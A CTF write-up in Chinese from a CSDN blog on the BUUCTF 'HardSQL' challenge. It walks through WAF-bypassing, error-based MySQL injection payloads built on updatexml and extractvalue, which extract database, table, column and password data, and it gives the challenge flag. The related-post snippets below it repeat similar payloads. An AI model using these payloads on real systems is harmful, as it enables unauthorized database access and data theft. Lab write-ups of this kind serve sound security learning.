HardSQL报错注入

最新推荐文章于 2023-04-12 21:07:48 发布
最新推荐文章于 2023-04-12 21:07:48 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 渗透测试 BUUCTF 文章标签: 报错注入 安全漏洞 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/120508698
版权

使用fuzz测试,过滤有点多,包括=【用like代替】,空格【用()代替】,union【用or代替】等等都被过滤

使用堆注入查询,似乎不行,而且substr也被禁用,尝试使用报错注入

updatexml或extractvalue

构造查询数据库payload

admin'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#

构造查询表payload

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek'))),0x7e),1))#

构造查询字段payload

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1'))),0x7e),1))#

构造查询password密码

admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(geek.H4rDsq1)),0x7e),1))#

拿到一半的flag

构造left和right的payload

lift:admin'or(updatexml(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1)),0x7e),1))#

right:admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)),0x7e),1))#

构造最后完整flag的时候出了点问题,合并的flag出重了,删减的时候又麻烦,可以把right(password,30)适当减小

flag{f7b7320b-3cfd-4b1a-a390-04ba01b35cdf}

flag{f7b7320b-3cfd-4b1a-a390-04ba01b35cdf}

bbb07
关注
专栏目录
[极客大挑战 2019]HardSQL
xj28555的博客
09-02 225
进入题目,一个登录框。 测试了下万能密码登录,无果,有WAF拦截,那接下来就是绕过WAF。 先抓包用bp进行FUZZ,看看有那些没有被拦截的函数。通过手工FUZZ和bpFUZZ结合,发现过滤了and、= 空格 union等多个sql关键字。 发现有一些,报错注入的函数是没有被过滤的,那我们这题就可以通过报错注入来进行注入。 这里我们利用updatexml函数进行报错注入。 payload #查看数据库信息 http://2d43986a-ef4e
[极客大挑战 2019]HardSQL -wp
freerats的博客
07-04 690
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 # 有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替 username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
【极客大挑战2019】Hard SQL注入解题
Bird&Bird
10-26 1307
1、打开BUUCTF在线评测,选择web----->【极客大挑战2019】HardSQL。 2、首先使用万能密码试一下,报错了。 3、普通方式union select注入,报同样错误 4、双写绕过试一下,还是报同样错误。 5、 那使用报错注入试一下吧。但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号。 爆库名 username=admin&password=123456'^extractvalue(1,concat(0x5c,(select(data.
BUUCTF——[极客大挑战 2019]HardSQL
doraemon12345的博客
06-01 262
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
CTF-Web-SQL注入
beihai2013
01-26 3322
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
SQL注入类型CTF题目总结
Lelouch_E的博客
11-25 1568
SQL注入类型CTF题union 注入buu Fakebookbuu Baby Sqli盲注buu Hack World报错注入buu hardsql其他buu BlackList union 注入 buu Fakebook 注册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL注入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
[极客大挑战2019] hard sql
qq_52907838的博客
05-10 228
经过开始的测试,输入1'报错,输入1' or 1=1#没用,输入1'or'显示密码错误,可以发现空格被过滤 进一步测试发现and,union也被过滤,于是想到用报错注入 则考虑用()绕过空格过滤,构造payload: 1'or(updatexml(1,concat(0x7e,database(),0x7e),0))# 可以得到数据库名:geek 第二部构造payload: 1'or(updatexml(1,concat(0x7e,(select(table_name)from(informati
[极客大挑战 2019]HardSQL 1
weixin_46601529的博客
11-15 1384
1.第一步猜测是什么闭合 一般用’ 或者 ‘’ 或者 ‘) 或者 ‘’) 当我们用’闭合发现报错说明可能是 ’ 这个时候再加注释 可以用%23、–+、#、–空格 这时候我们加上注释发现就不报错了,那么可以认定就是’闭合 3.这时候我们用order by 查看回显发现过滤了 4.这个时候我们就要在1’ 这个中间试有哪些被过滤了%23,发现select,from,or都报错了,没有回显’你可别被我逮住了,说明select,from,or都没有被过滤,但是union被过滤了,淦!!!那么正常的0’un.
极客大作战hard SQL--各种绕过
wssmiss的博客
04-28 396
极客大作战—hard SQL 考察对sql特殊字符与函数的绕过 尝试一下单引号报错 注释符无效 应该是被过滤了 #为被过滤但是无效。。看来只能手动闭合username处的引号 构造语句后面加and ‘1 Admin’ and ‘1发现有字符被抓到了,不是空格就是and 空格去掉发现and被过滤 And用异或^代替,成功绕过 测试空格是否被过滤,果然被过滤了 用/**/注释符无法绕过...
极客大挑战 Hardsql
weixin_45751765的博客
08-30 700
0x00 前言 a.sql注入fuzzing 碰到sql注入题时,为尽快确认过滤列,可做一个fuzzing_test 注意一次发太多包会429,适当调节引擎 可以看到736都是被过滤的
SQL注入实践 [极客大挑战 2019]HardSQL
weixin_43749601的博客
10-27 293
打开题目,发现这也还是一个SQL注入的题目。难度可能比之前的大,也就加了点过滤吧。 通过测试发现过滤了union,and,等于号,空格 可以使用updatexml或extractvalue报错注入法 查表: ?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1.
buuctf(hard sql)有待补充
最新发布
qq_75005708的博客
04-12 174
exp(int)函数返回e的x次方,当x的值足够大的时候就会导致函数的结果数据类型溢出,也就会因此报错:"DOUBLE value is out of range",与xpath的格式不符,所以会报错,0x7e的axii码为~,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息。查询完成,语句成功执行,返回值为0,再取反(~按位取反运算符),exp调用的时候e的那个数的次方,就会造成BigInt大数据类型溢出,就会报错。
LeetCode-SQL-[Hard]601. 体育馆的人流量
AlphaCat的博客
03-29 304
Create table If Not Exists stadium (id int, visit_date DATE NULL, people int) Truncate table stadium insert into stadium (id, visit_date, people) values ('1', '2017-01-01', '10') insert into stadium ...
SQL注入 报错(updatexml与extractvalue函数介绍)
一米八多的瑞兹的博客
12-22 841
1. Sqlmap 更新参数介绍 –purge 以安全模式删除所有sqlmap数据目录。 2. 演示数据表介绍 3. updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格
攻防世界之supersqli
qq_44111753的博客
11-16 356
攻防世界 supersqli 题目 WP: 输入1、2、3提交 发现输入的数值提交到inject 发现inject存在sql注入风险 尝试堆叠注入 发现数据库 查看supersqli中的表 发现两个表 尝试查询表内的所有内容 发现对select|update|delete|drop|insert|where进行了过滤 继续查看字段 发现1919810931114514表中的flag,但无法使用select语句,不能直接输入,但发现words表中的id属性和输入的参数inject很相似,都为整型
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值